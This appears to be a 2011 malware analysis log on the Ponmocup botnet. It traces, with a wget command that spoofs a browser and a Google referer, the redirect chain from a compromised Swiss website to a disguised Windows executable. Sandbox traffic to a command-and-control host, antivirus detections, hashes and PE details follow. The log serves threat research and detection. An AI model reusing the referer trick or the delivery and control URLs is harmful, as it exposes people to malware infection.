For general info about the Ponmocup malware / botnet please see: http://www9.dyndns-server.com:8080/pub/botnet-links.html

$ wget -S -v --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8)" --referer="http://www.google.ch/search?hl=de&q=www+gega+ch&aq=f&aqi=g10&aql=&oq=" http://www.gega.ch/index2.htm -O www.gega.ch

--14:23:34--  http://www.gega.ch/index2.htm
           => `www.gega.ch'
Resolving www.gega.ch... 92.43.216.118
Connecting to www.gega.ch|92.43.216.118|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 302 Found
  Connection: keep-alive
  Date: Thu, 30 Jun 2011 12:23:34 GMT
  Server: Microsoft-IIS/6.0
  X-Powered-By: ASP.NET
  Location: http://twowayserf.com/cgi-bin/r.cgi?p=15003&i=facca479&j=318&m=e0caf80392b339b45a8c1a76444af215&h=www.gega.ch&u=/index2.htm&q=&t=30.06.2011%2014:23:34
  Content-Length: 336
  Content-type: text/html
Location: http://twowayserf.com/cgi-bin/r.cgi?p=15003&i=facca479&j=318&m=e0caf80392b339b45a8c1a76444af215&h=www.gega.ch&u=/index2.htm&q=&t=30.06.2011%2014:23:34 [following]

--14:23:34--  http://twowayserf.com/cgi-bin/r.cgi?p=15003&i=facca479&j=318&m=e0caf80392b339b45a8c1a76444af215&h=www.gega.ch&u=/index2.htm&q=&t=30.06.2011%2014:23:34
           => `www.gega.ch'
Resolving twowayserf.com... 84.16.234.150
Connecting to twowayserf.com|84.16.234.150|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 302 Moved Temporarily
  Server: Apache/1.3.42
  Date: Thu, 30 Jun 2011 12:23:35 GMT
  Connection: close
  Location: http://protection1.therealityglove.com/se/3da49bea8f9c52ed6b9b49c68897e5f48a7141f2a345689bcbde32cfed7f76267b92e122de0df2c767ec0cd97426e07f4a1b36a6f463244bc7c2e2bc9cddbc/6e23d5f/www_gega_ch.com
Location: http://protection1.therealityglove.com/se/3da49bea8f9c52ed6b9b49c68897e5f48a7141f2a345689bcbde32cfed7f76267b92e122de0df2c767ec0cd97426e07f4a1b36a6f463244bc7c2e2bc9cddbc/6e23d5f/www_gega_ch.com [following]

--14:23:35--  http://protection1.therealityglove.com/se/3da49bea8f9c52ed6b9b49c68897e5f48a7141f2a345689bcbde32cfed7f76267b92e122de0df2c767ec0cd97426e07f4a1b36a6f463244bc7c2e2bc9cddbc/6e23d5f/www_gega_ch.com
           => `www.gega.ch'
Resolving protection1.therealityglove.com... 95.168.177.142
Connecting to protection1.therealityglove.com|95.168.177.142|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Server: Apache/1.3.42
  Date: Thu, 30 Jun 2011 12:23:36 GMT
  Content-Type: application/x-msdownload
  Connection: close
  Expires: Mon, 26 Jul 1997 05:00:00 GMT
  Cache-Control: must-revalidate, post-check=0, pre-check=0
  Cache-Control: private
  Content-Disposition: attachment; filename="www_gega_ch.com"
  Content-Length: 403383
  Content-Transfer-Encoding: binary
  Accept-Ranges: none
Length: 403,383 (394K) [application/x-msdownload]

100%[==================================================================================================================>] 403,383       1.44M/s

14:23:37 (1.44 MB/s) - `www.gega.ch' saved [403383/403383]

Anubis: http://anubis.iseclab.org/?action=result&task_id=19c898bc16ff574f47110a25ce7c672f2&format=html

- HTTP Conversations:
  From ANUBIS:1028 to 78.159.100.32:80 - [surfacechicago.net]
    Request: GET /html/license_43EC922A3D0E1F403834ED406BA8085A686E606DF596C71B1F47B22D93555C332C0C0719D7D5C142B8C2C3E65DCC50966E34BA8C4D56463B02F3FED9544A9D2924CF3F64589D6F1B6AEE7B83E9738A11F3A7C664F6BC84AA1B5B4824A007F3FD85586DDE35D8DFD83C52EF01BB4FC51EFA610EB05E9F31AACE0A4CE3F967AF4758E93775E2175873776B41C6B8B8E477551AC5DF821A2A30780101FAF813B0E0A5703F759B3C706981FD4A7869895157E39ED3AA844149D42318C1889EA4154625D988CD8E00FAE64FB6CD1A8B4980B2FDAA3A963707F0454AB9697C1861AC5B1A8A5B80C9A8349D67AA22D35E7D97A419B642773926FB9F0382AAFF9F800397340CD84A677BC8EBC7EB45D3FE9A1BF368EFFEE0FB69DCF5A74CC14D87B121909C9E0DC4C3931749D5EAFA2C1AC1F9CCBE46D0B108A71EE3DCE0F72064E86D5367EBA25E3A2E7BD20951E9F1E83C1C39BAADE24B9D8CABE60E179F194A8D45AC37C1DD7DC0D42B2B1DCC88B1FE4E04FC0C125C603F2F37BF6813FE63836B.html
    Response: 404 "Not Found"
  From ANUBIS:1029 to 78.159.100.32:80 - [surfacechicago.net]
    Request: GET /html/license[...].html
    Response: 404 "Not Found"

VT report: https://www.virustotal.com/file-scan/report.html?id=3631e9b8aa459ab29a8b64cd0a7a422d2da7539e38c3057ceef7bf5543cd9bea-1309436638
File name: www_gega_ch.com
Submission date: 2011-06-30 12:23:58 (UTC)
Result: 7/42 (16.7%)

BitDefender   7.2            2011.06.30  Gen:Variant.Kazy.15607
F-Secure      9.0.16440.0    2011.06.30  Gen:Variant.Kazy.15607
GData         22             2011.06.30  Gen:Variant.Kazy.15607
Ikarus        T3.1.1.104.0   2011.06.30  Trojan.Win32.Pirminay
Norman        6.07.10        2011.06.30  W32/Obfuscated.L
nProtect      2011-06-30.01  2011.06.30  Gen:Variant.Kazy.15607
Panda         10.0.3.5       2011.06.30  Suspicious file

MD5   : a8def263652676b550af0295413075bb
SHA1  : 9ddd348ee686d3c4b0371e247c275aaef0d7d4ae
SHA256: 3631e9b8aa459ab29a8b64cd0a7a422d2da7539e38c3057ceef7bf5543cd9bea
ssdeep: 12288:Bzo3MzVRdRRHNBMN170x0fE5HWUR+QBES3y:BzLVvRd0N1QE0Z+0ESi
File size : 403383 bytes
First seen: 2011-06-30 12:23:58
Last seen : 2011-06-30 12:23:58

TrID:
  UPX compressed Win32 Executable (39.5%)
  Win32 EXE Yoda's Crypter (34.3%)
  Win32 Executable Generic (11.0%)
  Win32 Dynamic Link Library (generic) (9.8%)
  Generic Win/DOS Executable (2.5%)

sigcheck:
  publisher....: Enuvbdmkt Rdomvsatslx
  copyright....: Copyright (C) Kpcnynwee Corp. 1981-1999
  product......: Pnbplieqe(R) Cscqpzm (R) 2000 Llgmbgilr Lewjht
  description..: Wireless Zero Configuration Service UI
  original name: wzcdlg.dll
  internal name: wzcdlg.dll
  file version.: 5.00.2195.6604
  comments.....: n/a
  signers......: -
  signing date.: -
  verified.....: Unsigned

packers (F-Prot): UPX

PEInfo: PE structure information
[[ basic data ]]
entrypointaddress: 0xE46B0
timedatestamp....: 0x4A4E60C0 (Fri Jul 03 19:49:20 2009)
machinetype......: 0x14c (I386)

[[ 3 section(s) ]]
name, viradd, virsiz, rawdsiz, ntropy, md5
UPX0, 0x1000, 0x82000, 0x0, 0.00, d41d8cd98f00b204e9800998ecf8427e
UPX1, 0x83000, 0x62000, 0x61A00, 7.88, 3f2ec746fedeff6c513ae3217b1d5613
.rsrc, 0xE5000, 0x1000, 0x800, 3.45, d52b1609573b0b25b444240d631622f6

[[ 7 import(s) ]]
KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll: RegCloseKey
GDI32.dll: BitBlt
MSVCRT.dll: exit
ole32.dll: CoTaskMemFree
RPCRT4.dll: NdrDllGetClassObject
USER32.dll: GetDC

Symantec reputation: Suspicious.Insight